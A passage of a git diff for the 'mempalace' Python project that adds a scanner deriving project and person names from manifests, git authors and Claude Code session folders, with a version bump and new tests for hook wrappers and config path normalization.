+        with open(path, "rb") as f:
+            return tomllib.load(f)
+    except (OSError, tomllib.TOMLDecodeError):
+        return {}
+
+
+def _parse_pyproject(path: Path) -> Optional[str]:
+    data = _parse_toml(path)
+    name = data.get("project", {}).get("name")
+    if isinstance(name, str) and name:
+        return name
+    name = data.get("tool", {}).get("poetry", {}).get("name")
+    return name if isinstance(name, str) and name else None
+
+
+def _parse_cargo(path: Path) -> Optional[str]:
+    data = _parse_toml(path)
+    name = data.get("package", {}).get("name")
+    return name if isinstance(name, str) and name else None
+
+
+def _parse_gomod(path: Path) -> Optional[str]:
+    try:
+        text = path.read_text(encoding="utf-8", errors="replace")
+    except OSError:
+        return None
+    # First "module" directive; a trailing "/vN" is the major-version suffix, not the name.
+    m = re.search(r'^[ \t]*module[ \t]+["`]?([^\s"`]+)', text, re.MULTILINE)
+    parts = [p for p in m.group(1).split("/") if p] if m else []
+    parts = parts[:-1] if len(parts) > 1 and re.fullmatch(r"v\d+", parts[-1]) else parts
+    return parts[-1] if parts else None
+
+
+MANIFEST_PRIORITY = {
+    "pyproject.toml": 0,
+    "package.json": 1,
+    "Cargo.toml": 2,
+    "go.mod": 3,
+}
+# Sentinel so unknown manifests always sort after the known manifest types above.
+UNKNOWN_MANIFEST_PRIORITY = max(MANIFEST_PRIORITY.values()) + 1
+MANIFEST_PARSERS = {
+    "package.json": _parse_package_json,
+    "pyproject.toml": _parse_pyproject,
+    "Cargo.toml": _parse_cargo,
+    "go.mod": _parse_gomod,
+}
+
+
+# ==================== GIT HELPERS ====================
+
+
+def _run_git(cwd: Path, *args: str, timeout: int = GIT_TIMEOUT) -> str:
+    try:
+        r = subprocess.run(
+            ["git", "-C", str(cwd), *args],
+            capture_output=True,
+            text=True,
+            timeout=timeout,
+            check=False,
+        )
+        return r.stdout if r.returncode == 0 else ""
+    except (OSError, subprocess.SubprocessError):
+        return ""
+
+
+def _git_user_identity(repo: Path) -> tuple[str, str]:
+    """Return (name, email) for this repo, falling back to global config."""
+    name = _run_git(repo, "config", "user.name", timeout=2).strip()
+    email = _run_git(repo, "config", "user.email", timeout=2).strip()
+    return name, email
+
+
+def _global_git_identity() -> tuple[str, str]:
+    try:
+        n = subprocess.run(
+            ["git", "config", "--global", "user.name"],
+            capture_output=True,
+            text=True,
+            timeout=2,
+            check=False,
+        ).stdout.strip()
+        e = subprocess.run(
+            ["git", "config", "--global", "user.email"],
+            capture_output=True,
+            text=True,
+            timeout=2,
+            check=False,
+        ).stdout.strip()
+        return n, e
+    except (OSError, subprocess.SubprocessError):
+        return "", ""
+
+
+def _git_authors(repo: Path) -> list[tuple[str, str]]:
+    out = _run_git(
+        repo,
+        "log",
+        f"--max-count={MAX_COMMITS_PER_REPO}",
+        "--format=%aN|%aE",
+    )
+    result = []
+    for line in out.splitlines():
+        if "|" in line:
+            name, email = line.rsplit("|", 1)  # split at the LAST "|": names may contain one
+            result.append((name.strip(), email.strip()))
+    return result
+
+
+# ==================== BOT / NAME FILTERING ====================
+
+
+_BOT_NAME_PATTERNS = [
+    r"\[bot\]",
+    r"^dependabot",
+    r"^renovate",
+    r"^github-actions",
+    r"^actions-user",
+    r"-bot$",
+    r"\bbot$",  # catches "PR Bot", "Release Bot", etc. Not "robot" (no \b)
+    r"^bot-",
+    r"^snyk",
+    r"^greenkeeper",
+    r"^semantic-release",
+    r"^allcontributors",
+    r"-autoroll$",
+    r"^auto-format",
+    r"^pre-commit-ci",
+]
+_BOT_EMAIL_PATTERNS = [
+    # `@users.noreply.github.com` is GitHub's privacy-protected human email —
+    # do NOT filter it. Real bots identify themselves via the display name
+    # (usually containing "[bot]"), which is caught by _BOT_NAME_PATTERNS.
+    r"bot@",
+    r"-bot@",
+    r"\[bot\]@",
+]
+
+_BOT_RE_NAMES = [re.compile(p) for p in _BOT_NAME_PATTERNS]
+_BOT_RE_EMAILS = [re.compile(p) for p in _BOT_EMAIL_PATTERNS]
+
+
+def _is_bot(name: str, email: str) -> bool:
+    ln, le = name.lower(), email.lower()
+    return any(rx.search(ln) for rx in _BOT_RE_NAMES) or any(rx.search(le) for rx in _BOT_RE_EMAILS)
+
+
+def _looks_like_real_name(name: str) -> bool:
+    """Heuristic: a human's name has a space and at least two title-cased parts.
+
+    Filters out handles (lowercase, digits, one-token usernames).
+    """
+    if not name or " " not in name:
+        return False
+    parts = name.split()
+    if len(parts) < 2:
+        return False
+    # First and last parts must start with an uppercase letter
+    return parts[0][:1].isupper() and parts[-1][:1].isupper()
+
+
+# ==================== DIRECTORY WALK ====================
+
+
+def _walk(root: Path, max_depth: int = MAX_DEPTH):
+    for dirpath, dirs, files in os.walk(root):
+        dirs[:] = [d for d in dirs if d not in SKIP_DIRS and not d.startswith(".")]
+        rel = Path(dirpath).relative_to(root)
+        depth = 0 if rel == Path(".") else len(rel.parts)
+        if depth > max_depth:
+            dirs.clear()
+            continue
+        yield Path(dirpath), dirs, files
+
+
+def _has_git_marker(path: Path) -> bool:
+    git_path = path / ".git"
+    return git_path.is_dir() or git_path.is_file()
+
+
+def _manifest_sort_key(entry: tuple[str, str, Path], repo_root: Path) -> tuple[int, int, str]:
+    """Sort manifests by shallowest path first, then known manifest priority,
+    then lexicographic path for deterministic tie-breaking.
+    """
+    manifest_file, _project_name, manifest_dir = entry
+    try:
+        rel = manifest_dir.relative_to(repo_root)
+        depth = len(rel.parts)
+        rel_str = rel.as_posix()
+    except ValueError:
+        depth = MAX_DEPTH + 1
+        rel_str = manifest_dir.as_posix()
+    return (depth, MANIFEST_PRIORITY.get(manifest_file, UNKNOWN_MANIFEST_PRIORITY), rel_str)
+
+
+def find_git_repos(root: Path, max_depth: int = MAX_DEPTH) -> list[Path]:
+    """Return git repo roots under `root` (including root itself if it's a repo)."""
+    root = root.resolve()
+    repos: list[Path] = []
+    if _has_git_marker(root):
+        # Root is a repo — still walk for nested repos (submodules, etc.)
+        repos.append(root)
+    for dirpath, dirs, _ in _walk(root, max_depth):
+        if dirpath == root:
+            continue
+        if _has_git_marker(dirpath):
+            repos.append(dirpath)
+            dirs.clear()  # don't descend into this repo's contents from here
+    return repos
+
+
+def _collect_manifest_names(repo_root: Path) -> list[tuple[str, str, Path]]:
+    """Return (manifest_filename, project_name, dirpath) within a repo.
+
+    Does not descend into nested git repos.
+    """
+    found: list[tuple[str, str, Path]] = []
+    for dirpath, dirs, files in _walk(repo_root):
+        if dirpath != repo_root and _has_git_marker(dirpath):
+            dirs.clear()
+            continue
+        for fname in files:
+            parser = MANIFEST_PARSERS.get(fname)
+            if not parser:
+                continue
+            name = parser(dirpath / fname)
+            if name:
+                found.append((fname, name, dirpath))
+    return sorted(found, key=lambda entry: _manifest_sort_key(entry, repo_root))
+
+
+# ==================== MAIN SCAN ====================
+
+
+class _UnionFind:
+    """Minimal union-find for (name, email) identity resolution."""
+
+    def __init__(self) -> None:
+        self.parent: dict = {}
+
+    def find(self, x):
+        if x not in self.parent:
+            self.parent[x] = x
+            return x
+        root = x
+        while self.parent[root] != root:
+            root = self.parent[root]
+        while self.parent[x] != root:
+            self.parent[x], x = root, self.parent[x]
+        return root
+
+    def union(self, a, b) -> None:
+        ra, rb = self.find(a), self.find(b)
+        if ra != rb:
+            self.parent[ra] = rb
+
+
+def _dedupe_people(
+    all_commits: list[tuple[str, str, str]],
+) -> dict[str, PersonInfo]:
+    """Group commits by identity. Two commits are the same person if they
+    share a name OR an email. Display name = most frequent non-bot variant.
+
+    ``all_commits`` is a list of (name, email, repo_str) triples from every repo.
+    """
+    uf = _UnionFind()
+    for name, email, _repo in all_commits:
+        uf.union(("name", name), ("email", email) if email else ("name", name))
+
+    # Aggregate by component root
+    component_commits: dict = {}
+    for name, email, repo in all_commits:
+        key = uf.find(("name", name))
+        entry = component_commits.setdefault(
+            key, {"name_counts": {}, "emails": set(), "repos": set(), "total": 0}
+        )
+        entry["name_counts"][name] = entry["name_counts"].get(name, 0) + 1
+        if email:
+            entry["emails"].add(email)
+        entry["repos"].add(repo)
+        entry["total"] += 1
+
+    # Pick display name per component: the most-frequent variant that looks
+    # like a real name; fall back to most-frequent overall.
+    people: dict[str, PersonInfo] = {}
+    for _key, entry in component_commits.items():
+        candidates = sorted(entry["name_counts"].items(), key=lambda x: -x[1])
+        display = next(
+            (n for n, _ in candidates if _looks_like_real_name(n)),
+            candidates[0][0],
+        )
+        if not _looks_like_real_name(display):
+            continue  # Skip handles and single-token names
+        # If we already have this display (rare — distinct components with the
+        # same chosen display), merge into the existing entry.
+        existing = people.get(display)
+        if existing:
+            existing.total_commits += entry["total"]
+            existing.emails.update(entry["emails"])
+            existing.repos.update(entry["repos"])
+        else:
+            people[display] = PersonInfo(
+                name=display,
+                total_commits=entry["total"],
+                emails=set(entry["emails"]),
+                repos=set(entry["repos"]),
+            )
+    return people
+
+
+def scan(root: str | os.PathLike) -> tuple[list[ProjectInfo], list[PersonInfo]]:
+    """Scan `root` for projects and people. Returns (projects, people) sorted."""
+    root_path = Path(root).expanduser().resolve()
+    if not root_path.is_dir():
+        return [], []
+
+    repos = find_git_repos(root_path)
+
+    # Identify current user from first repo's git config, fall back to global
+    me_name, me_email = "", ""
+    if repos:
+        me_name, me_email = _git_user_identity(repos[0])
+    if not me_name and not me_email:
+        me_name, me_email = _global_git_identity()
+
+    projects: dict[str, ProjectInfo] = {}
+    all_commits: list[tuple[str, str, str]] = []
+
+    for repo in repos:
+        manifests = _collect_manifest_names(repo)
+        if manifests:
+            manifest_file, proj_name, _ = manifests[0]
+        else:
+            manifest_file, proj_name = None, repo.name
+
+        authors = _git_authors(repo)
+        non_bot_authors = [(name, email) for name, email in authors if not _is_bot(name, email)]
+        total_commits = len(non_bot_authors)
+        user_commits = 0
+        author_counts: dict[str, int] = {}
+        for name, email in non_bot_authors:
+            author_counts[name] = author_counts.get(name, 0) + 1
+            all_commits.append((name, email, str(repo)))
+            if (me_name and name == me_name) or (me_email and email == me_email):
+                user_commits += 1
+
+        is_mine = False
+        if user_commits > 0:
+            sorted_authors = sorted(author_counts.items(), key=lambda x: -x[1])
+            top5 = {n for n, _ in sorted_authors[:5]}
+            if me_name and me_name in top5:
+                is_mine = True
+            elif total_commits and user_commits / total_commits >= 0.10:
+                is_mine = True
+            elif user_commits >= 20:
+                is_mine = True
+
+        proj = ProjectInfo(
+            name=proj_name,
+            repo_root=repo,
+            manifest=manifest_file,
+            has_git=True,
+            total_commits=total_commits,
+            user_commits=user_commits,
+            is_mine=is_mine,
+        )
+        existing = projects.get(proj_name)
+        if existing is None or proj.user_commits > existing.user_commits:
+            projects[proj_name] = proj
+
+    people = _dedupe_people(all_commits)
+
+    # Handle case: root has manifests but no git repo anywhere
+    if not repos:
+        manifests = _collect_manifest_names(root_path)
+        for manifest_file, proj_name, _dirpath in manifests:
+            if proj_name in projects:
+                continue
+            projects[proj_name] = ProjectInfo(
+                name=proj_name,
+                repo_root=root_path,
+                manifest=manifest_file,
+                has_git=False,
+            )
+
+    project_list = sorted(
+        projects.values(),
+        key=lambda p: (not p.is_mine, -p.user_commits, -p.total_commits, p.name),
+    )
+    people_list = sorted(people.values(), key=lambda p: -p.total_commits)
+
+    return project_list, people_list
+
+
+# ==================== ADAPTER ====================
+
+
+def to_detected_dict(
+    projects: list[ProjectInfo],
+    people: list[PersonInfo],
+    project_cap: int = 15,
+    people_cap: int = 15,
+) -> dict:
+    """Convert scan results into the dict shape produced by entity_detector.detect_entities."""
+    proj_entries = [
+        {
+            "name": p.name,
+            "type": "project",
+            "confidence": round(p.confidence, 2),
+            "frequency": p.user_commits or p.total_commits,
+            "signals": [p.to_signal()],
+        }
+        for p in projects[:project_cap]
+    ]
+    people_entries = [
+        {
+            "name": p.name,
+            "type": "person",
+            "confidence": round(p.confidence, 2),
+            "frequency": p.total_commits,
+            "signals": [p.to_signal()],
+        }
+        for p in people[:people_cap]
+    ]
+    return {
+        "people": people_entries,
+        "projects": proj_entries,
+        "uncertain": [],
+    }
+
+
+# ==================== MERGE WITH REGEX DETECTOR ====================
+
+
+def _merge_detected(primary: dict, secondary: dict, drop_secondary_uncertain: bool = False) -> dict:
+    """Merge two detected dicts. Primary entries win on name conflict.
+
+    Dedup is case-insensitive so "mempalace" (manifest name) absorbs "MemPalace"
+    (docs/prose reference) instead of surfacing both.
+
+    If ``drop_secondary_uncertain`` is True, the secondary's uncertain bucket is
+    dropped entirely — useful when the primary signal is strong (real repo
+    found) and we'd rather not ask the user to adjudicate prose-regex noise.
+    """
+    seen = {e["name"].lower() for cat in primary.values() for e in cat}
+    merged = {k: list(v) for k, v in primary.items()}
+    for cat_key in ("people", "projects", "uncertain"):
+        if cat_key == "uncertain" and drop_secondary_uncertain:
+            continue
+        for e in secondary.get(cat_key, []):
+            if e["name"].lower() in seen:
+                continue
+            merged.setdefault(cat_key, []).append(e)
+            seen.add(e["name"].lower())
+    return merged
+
+
+def discover_entities(
+    project_dir: str | os.PathLike,
+    languages: tuple = ("en",),
+    prose_file_cap: int = 10,
+    project_cap: int = 15,
+    people_cap: int = 15,
+    llm_provider: object = None,
+    show_progress: bool = True,
+) -> dict:
+    """Top-level entity discovery: real signals first, prose detection second.
+
+    Returns the same dict shape as ``entity_detector.detect_entities`` so it
+    plugs into ``confirm_entities`` unchanged.
+
+    Order of signal preference:
+      1. Package manifests (package.json, pyproject.toml, Cargo.toml, go.mod)
+         → canonical project names
+      2. Git commit authors → real people with real commit counts
+      3. Claude Code conversation dirs (~/.claude/projects/) → per-session
+         project names (pulled from each session's ``cwd`` metadata)
+      4. Regex entity detection on prose files → supplementary names only
+         mentioned in docs/notes (not code)
+      5. Optional LLM refinement pass — reclassifies ambiguous candidates
+         using the caller-supplied provider
+
+    Passing ``llm_provider`` enables phase-2 refinement. The caller is
+    responsible for constructing the provider (``llm_client.get_provider``)
+    and confirming availability. Refinement is blocking-interactive:
+    progress prints to stderr; Ctrl-C returns partial results.
+    """
+    projects, people = scan(project_dir)
+
+    # If the target is a Claude Code conversations root, extract per-project
+    # entries from there too. Same ProjectInfo shape, so dedup logic works.
+    from mempalace.convo_scanner import is_claude_projects_root, scan_claude_projects
+
+    root_path = Path(project_dir).expanduser().resolve()
+    if is_claude_projects_root(root_path):
+        convo_projects = scan_claude_projects(root_path)
+        # Dedup by name against the git-manifest list, preferring entries
+        # with more user_commits as signal strength. Keyed case-insensitively
+        # so a `pyproject.toml` name like `mempalace` and a Claude Code
+        # `cwd` variant like `MemPalace` collapse into one entry — matches
+        # the case-insensitive dedup used in `_merge_detected` and
+        # `miner.add_to_known_entities`.
+        by_name: dict[str, ProjectInfo] = {p.name.lower(): p for p in projects}
+        for cp in convo_projects:
+            key = cp.name.lower()
+            existing = by_name.get(key)
+            if existing is None or cp.user_commits > existing.user_commits:
+                by_name[key] = cp
+        projects = sorted(
+            by_name.values(),
+            key=lambda p: (not p.is_mine, -p.user_commits, -p.total_commits, p.name),
+        )
+
+    real_signal = to_detected_dict(projects, people, project_cap=project_cap, people_cap=people_cap)
+
+    # Secondary pass: prose-only extraction catches names mentioned in docs
+    # that never made a commit (e.g. a stakeholder or family member in notes).
+    from mempalace.entity_detector import detect_entities, scan_for_detection
+
+    prose_files = scan_for_detection(str(project_dir), max_files=prose_file_cap)
+    prose_detected = (
+        detect_entities(prose_files, languages=languages)
+        if prose_files
+        else {"people": [], "projects": [], "uncertain": []}
+    )
+
+    # Without LLM refinement, suppress regex "uncertain" noise when real
+    # manifest/git signal exists. With LLM refinement enabled, keep those
+    # candidates so the model can promote real entities or drop common words.
+    has_real_signal = bool(projects) or bool(people)
+    merged = _merge_detected(
+        real_signal,
+        prose_detected,
+        drop_secondary_uncertain=has_real_signal and llm_provider is None,
+    )
+
+    # Optional phase 2: LLM refinement.
+    if llm_provider is not None:
+        from mempalace.llm_refine import collect_corpus_text, refine_entities
+
+        corpus = collect_corpus_text(str(project_dir))
+        result = refine_entities(
+            merged,
+            corpus,
+            llm_provider,
+            show_progress=show_progress,
+            allow_project_promotions=not has_real_signal,
+        )
+        if show_progress:
+            status_bits = []
+            if result.cancelled:
+                status_bits.append("cancelled")
+            if result.reclassified:
+                status_bits.append(f"reclassified {result.reclassified}")
+            if result.dropped:
+                status_bits.append(f"dropped {result.dropped}")
+            if result.errors:
+                status_bits.append(f"{len(result.errors)} batch error(s)")
+            if status_bits:
+                import sys as _sys
+
+                print(f"  LLM refine: {', '.join(status_bits)}", file=_sys.stderr)
+        merged = result.merged
+
+    return merged
+
+
+# ==================== CLI ====================
+
+
+if __name__ == "__main__":
+    import sys
+
+    target = sys.argv[1] if len(sys.argv) > 1 else "."
+    projs, ppl = scan(target)
+    print(f"=== PROJECTS ({len(projs)}) ===")
+    for p in projs[:30]:
+        mark = "★" if p.is_mine else " "
+        print(f"  {mark} {p.name:35} conf={p.confidence:.2f}  {p.to_signal()}")
+    print()
+    print(f"=== PEOPLE ({len(ppl)}) ===")
+    for p in ppl[:30]:
+        print(f"    {p.name:30} conf={p.confidence:.2f}  {p.to_signal()}")
diff --git a/mempalace/version.py b/mempalace/version.py
index 69e6e1192..7f40b3185 100644
--- a/mempalace/version.py
+++ b/mempalace/version.py
@@ -1,3 +1,3 @@
 """Single source of truth for the MemPalace package version."""
 
-__version__ = "3.3.2"
+__version__ = "3.3.3"
diff --git a/pyproject.toml b/pyproject.toml
index 96b560473..617c067c4 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
 [project]
 name = "mempalace"
-version = "3.3.2"
+version = "3.3.3"
 description = "Give your AI a memory — mine projects and conversations into a searchable palace. No API key required."
 readme = "README.md"
 requires-python = ">=3.9"
@@ -29,6 +29,7 @@ classifiers = [
 dependencies = [
     "chromadb>=1.5.4,<2",
     "pyyaml>=6.0,<7",
+    "tomli>=2.0.0; python_version < '3.11'",
 ]
 
 [project.urls]
@@ -38,6 +39,7 @@ Repository = "https://github.com/MemPalace/mempalace"
 
 [project.scripts]
 mempalace = "mempalace.cli:main"
+mempalace-mcp = "mempalace.mcp_server:main"
 
 [project.entry-points."mempalace.backends"]
 chroma = "mempalace.backends.chroma:ChromaBackend"
diff --git a/tests/test_claude_plugin_hook_wrappers.py b/tests/test_claude_plugin_hook_wrappers.py
new file mode 100644
index 000000000..e427e0c1f
--- /dev/null
+++ b/tests/test_claude_plugin_hook_wrappers.py
@@ -0,0 +1,192 @@
+"""Execution tests for Claude plugin hook wrapper scripts."""
+
+import os
+import shutil
+import subprocess
+from pathlib import Path
+
+import pytest
+
+REPO_ROOT = Path(__file__).resolve().parents[1]
+PLUGIN_HOOKS_DIR = REPO_ROOT / ".claude-plugin" / "hooks"
+BASH = shutil.which("bash")
+
+pytestmark = pytest.mark.skipif(
+    BASH is None,
+    reason="bash required for Claude plugin hook wrapper tests",
+)
+
+SCRIPT_CASES = [
+    ("mempal-stop-hook.sh", "stop"),
+    ("mempal-precompact-hook.sh", "precompact"),
+]
+
+
+def _shell_path(path: Path) -> str:
+    return path.as_posix()  # forward-slash form, used when embedding paths in sh stubs
+
+
+def _write_executable(path: Path, content: str) -> None:
+    path.write_text(content, encoding="utf-8")
+    path.chmod(0o755)  # rwxr-xr-x so the stub can be executed
+
+
+def _make_bin_dir(tmp_path: Path, executables: dict[str, str]) -> Path:
+    stub_dir = tmp_path / "bin"
+    stub_dir.mkdir()
+    for stub_name in executables:  # one executable stub file per mapping entry
+        _write_executable(stub_dir / stub_name, executables[stub_name])
+    return stub_dir
+
+
+def _capture_stdin_to(output_path: Path) -> str:  # returns an sh snippet, not a result
+    return (
+        'stdin_payload=""\n'
+        'while IFS= read -r line || [ -n "$line" ]; do\n'  # handles unterminated last line
+        '  stdin_payload="${stdin_payload}${line}"\n'  # joined without newlines
+        "done\n"
+        f'printf \'%s\' "$stdin_payload" > "{_shell_path(output_path)}"\n'
+    )
+
+
+def _run_hook(
+    script_name: str,
+    payload: str,
+    bin_dir: Path,
+) -> subprocess.CompletedProcess[str]:
+    # Run the wrapper under bash, feeding `payload` on stdin, with PATH set to bin_dir only.
+    assert BASH is not None
+    hook_script = _shell_path(PLUGIN_HOOKS_DIR / script_name)
+    isolated_env = {**os.environ, "PATH": str(bin_dir)}
+
+    return subprocess.run(
+        [BASH, hook_script],
+        input=payload,
+        text=True,
+        capture_output=True,
+        cwd=REPO_ROOT,
+        env=isolated_env,
+    )
+
+
+@pytest.mark.parametrize(("script_name", "hook_name"), SCRIPT_CASES)
+def test_plugin_hook_wrapper_prefers_mempalace_cli(
+    tmp_path: Path, script_name: str, hook_name: str
+) -> None:
+    args_file = tmp_path / "args.txt"
+    stdin_file = tmp_path / "stdin.json"
+
+    bin_dir = _make_bin_dir(
+        tmp_path,
+        {
+            "mempalace": (  # stub records its argv and stdin, then prints "{}"
+                "#!/bin/sh\n"
+                f'printf \'%s\' "$*" > "{_shell_path(args_file)}"\n'
+                f"{_capture_stdin_to(stdin_file)}"
+                "printf '{}\\n'\n"
+            ),
+            "python": "#!/bin/sh\nexit 99\n",  # always exits 99, whatever the arguments
+            "python3": "#!/bin/sh\nexit 99\n",  # always exits 99, whatever the arguments
+        },
+    )
+
+    payload = '{"session_id":"abc123"}'
+    result = _run_hook(script_name, payload, bin_dir)
+
+    assert result.returncode == 0
+    assert result.stdout == "{}\n"
+    assert (
+        args_file.read_text(encoding="utf-8")
+        == f"hook run --hook {hook_name} --harness claude-code"
+    )
+    assert stdin_file.read_text(encoding="utf-8") == payload  # stdin reached the CLI intact
+
+
+@pytest.mark.parametrize(("script_name", "hook_name"), SCRIPT_CASES)
+@pytest.mark.parametrize("python_name", ["python3", "python"])
+def test_plugin_hook_wrapper_falls_back_to_importable_python(
+    tmp_path: Path, script_name: str, hook_name: str, python_name: str
+) -> None:
+    args_file = tmp_path / "args.txt"
+    stdin_file = tmp_path / "stdin.json"
+
+    python_stub = (
+        "#!/bin/sh\n"
+        'if [ "$1" = "-c" ]; then\n'
+        "  exit 0\n"
+        "fi\n"
+        f'printf \'%s\' "$*" > "{_shell_path(args_file)}"\n'
+        f"{_capture_stdin_to(stdin_file)}"
+        "printf '{}\\n'\n"
+    )
+    bin_dir = _make_bin_dir(tmp_path, {python_name: python_stub})
+
+    payload = '{"session_id":"xyz789"}'
+    result = _run_hook(script_name, payload, bin_dir)
+
+    assert result.returncode == 0
+    assert result.stdout == "{}\n"
+    assert (
+        args_file.read_text(encoding="utf-8")
+        == f"-m mempalace hook run --hook {hook_name} --harness claude-code"
+    )
+    assert stdin_file.read_text(encoding="utf-8") == payload
+
+
+@pytest.mark.parametrize(("script_name", "hook_name"), SCRIPT_CASES)
+def test_plugin_hook_wrapper_errors_cleanly_when_no_runner_exists(
+    tmp_path: Path, script_name: str, hook_name: str
+) -> None:
+    # An empty stub directory leaves no mempalace, python3 or python on PATH.
+    empty_bin = _make_bin_dir(tmp_path, {})
+    outcome = _run_hook(script_name, '{"session_id":"no-runner"}', empty_bin)
+    expected_error = "could not find a runnable mempalace command or module"
+
+    assert outcome.returncode != 0
+    assert outcome.stdout == ""
+    assert expected_error in outcome.stderr
+
+
+@pytest.mark.parametrize(("script_name", "hook_name"), SCRIPT_CASES)
+def test_plugin_hook_wrapper_falls_back_to_python_when_python3_cannot_import(
+    tmp_path: Path, script_name: str, hook_name: str
+) -> None:
+    args_file = tmp_path / "args.txt"
+    stdin_file = tmp_path / "stdin.json"
+    bad_python3_used = tmp_path / "bad_python3_used.txt"
+
+    bin_dir = _make_bin_dir(
+        tmp_path,
+        {
+            "python3": (
+                "#!/bin/sh\n"
+                'if [ "$1" = "-c" ]; then\n'
+                "  exit 1\n"
+                "fi\n"
+                f"printf 'used' > \"{_shell_path(bad_python3_used)}\"\n"
+                "echo 'No module named mempalace' >&2\n"
+                "exit 1\n"
+            ),
+            "python": (
+                "#!/bin/sh\n"
+                'if [ "$1" = "-c" ]; then\n'
+                "  exit 0\n"
+                "fi\n"
+                f'printf \'%s\' "$*" > "{_shell_path(args_file)}"\n'
+                f"{_capture_stdin_to(stdin_file)}"
+                "printf '{}\\n'\n"
+            ),
+        },
+    )
+
+    payload = '{"session_id":"fallback"}'
+    result = _run_hook(script_name, payload, bin_dir)
+
+    assert result.returncode == 0
+    assert result.stdout == "{}\n"
+    assert (
+        args_file.read_text(encoding="utf-8")
+        == f"-m mempalace hook run --hook {hook_name} --harness claude-code"
+    )
+    assert stdin_file.read_text(encoding="utf-8") == payload
+    assert not bad_python3_used.exists()
diff --git a/tests/test_cli.py b/tests/test_cli.py
index c4b420307..1c4dfbda3 100644
--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -334,9 +334,9 @@ def test_mcp_command_prints_setup_guidance(monkeypatch, capsys):
 
     captured = capsys.readouterr()
     assert "MemPalace MCP quick setup:" in captured.out
-    assert "claude mcp add mempalace -- python -m mempalace.mcp_server" in captured.out
+    assert "claude mcp add mempalace -- mempalace-mcp" in captured.out
     assert "\nOptional custom palace:\n" in captured.out
-    assert "python -m mempalace.mcp_server --palace /path/to/palace" in captured.out
+    assert "mempalace-mcp --palace /path/to/palace" in captured.out
     assert "[--palace /path/to/palace]" not in captured.out
     assert captured.err == ""
 
@@ -349,7 +349,7 @@ def test_mcp_command_uses_custom_palace_path_when_provided(monkeypatch, capsys):
     captured = capsys.readouterr()
     expanded = str(Path("~/tmp/my palace").expanduser())
 
-    assert "python -m mempalace.mcp_server --palace" in captured.out
+    assert "mempalace-mcp --palace" in captured.out
     assert expanded in captured.out
     assert "Optional custom palace:" not in captured.out
     assert "[--palace /path/to/palace]" not in captured.out
diff --git a/tests/test_config.py b/tests/test_config.py
index e6dffc352..824f6a8c6 100644
--- a/tests/test_config.py
+++ b/tests/test_config.py
@@ -21,10 +21,62 @@ def test_config_from_file():
 
 
 def test_env_override():
-    os.environ["MEMPALACE_PALACE_PATH"] = "/env/palace"
-    cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
-    assert cfg.palace_path == "/env/palace"
-    del os.environ["MEMPALACE_PALACE_PATH"]
+    raw = "/env/palace"
+    os.environ["MEMPALACE_PALACE_PATH"] = raw
+    try:
+        cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
+        # palace_path normalizes with abspath + expanduser to match the
+        # --palace CLI code path. On Unix that's a no-op for "/env/palace";
+        # on Windows abspath prepends the current drive letter.
+        assert cfg.palace_path == os.path.abspath(os.path.expanduser(raw))
+    finally:
+        del os.environ["MEMPALACE_PALACE_PATH"]
+
+
+def test_env_path_expanduser(monkeypatch):
+    # Tilde must be expanded to match the --palace CLI code path. We don't
+    # assert "~" is absent from the final string because Windows 8.3 short
+    # paths (e.g. C:\Users\RUNNER~1\...) legitimately contain tildes — the
+    # equality check is authoritative.
+    raw = os.path.join("~", "mempalace-test")
+    # monkeypatch.setenv restores the variable's previous state at teardown,
+    # so a pre-existing MEMPALACE_PALACE_PATH is not lost (a bare `del` in a
+    # finally block would erase it for the remainder of the test session).
+    monkeypatch.setenv("MEMPALACE_PALACE_PATH", raw)
+    cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
+    assert cfg.palace_path == os.path.abspath(os.path.expanduser(raw))
+    assert cfg.palace_path.endswith("mempalace-test")
+
+
+def test_env_path_abspath_collapses_traversal(monkeypatch):
+    # Build a raw path with a .. segment using the platform separator so
+    # the assertion is portable (Windows uses \, POSIX uses /).
+    raw = os.path.join(tempfile.gettempdir(), "palace", "..", "mempalace-test")
+    expected = os.path.abspath(os.path.expanduser(raw))
+    # Set the variable through monkeypatch so that whatever value (or
+    # absence) MEMPALACE_PALACE_PATH had before this test is restored at
+    # teardown instead of being deleted outright.
+    monkeypatch.setenv("MEMPALACE_PALACE_PATH", raw)
+    cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
+    # .. segments must be collapsed, not preserved literally.
+    assert ".." not in cfg.palace_path
+    assert cfg.palace_path == expected
+
+
+def test_env_path_legacy_alias_normalized(monkeypatch):
+    # Legacy MEMPAL_PALACE_PATH gets the same normalization treatment as
+    # MEMPALACE_PALACE_PATH. We don't assert "~" is absent from the final
+    # string because Windows 8.3 short paths (e.g. C:\Users\RUNNER~1\...)
+    # legitimately contain tildes — the equality check below is authoritative.
+    #
+    # monkeypatch undoes both environment changes at teardown, so a
+    # MEMPALACE_PALACE_PATH that was set before this test is not lost.
+    monkeypatch.delenv("MEMPALACE_PALACE_PATH", raising=False)
+    raw = os.path.join("~", "legacy-alias", "..", "mempalace-test")
+    monkeypatch.setenv("MEMPAL_PALACE_PATH", raw)
+    cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
+    assert ".." not in cfg.palace_path
+    assert cfg.palace_path == os.path.abspath(os.path.expanduser(raw))
 
 
 def test_init():
diff --git a/tests/test_config_extra.py b/tests/test_config_extra.py
index d0d9b5db6..f7418c61a 100644
--- a/tests/test_config_extra.py
+++ b/tests/test_config_extra.py
@@ -63,10 +63,14 @@ def test_save_people_map(tmp_path):
 def test_env_mempal_palace_path(tmp_path):
     """MEMPAL_PALACE_PATH (legacy) should also work."""
     os.environ.pop("MEMPALACE_PALACE_PATH", None)
-    os.environ["MEMPAL_PALACE_PATH"] = "/legacy/path"
+    raw = "/legacy/path"
+    os.environ["MEMPAL_PALACE_PATH"] = raw
     try:
         cfg = MempalaceConfig(config_dir=str(tmp_path))
-        assert cfg.palace_path == "/legacy/path"
+        # palace_path is normalized via abspath + expanduser — compare
+        # against the normalized form so the test is portable between
+        # POSIX (no-op) and Windows (prepends current drive letter).
+        assert cfg.palace_path == os.path.abspath(os.path.expanduser(raw))
     finally:
         del os.environ["MEMPAL_PALACE_PATH"]
 
diff --git a/tests/test_convo_scanner.py b/tests/test_convo_scanner.py
new file mode 100644
index 000000000..01e980b80
--- /dev/null
+++ b/tests/test_convo_scanner.py
@@ -0,0 +1,218 @@
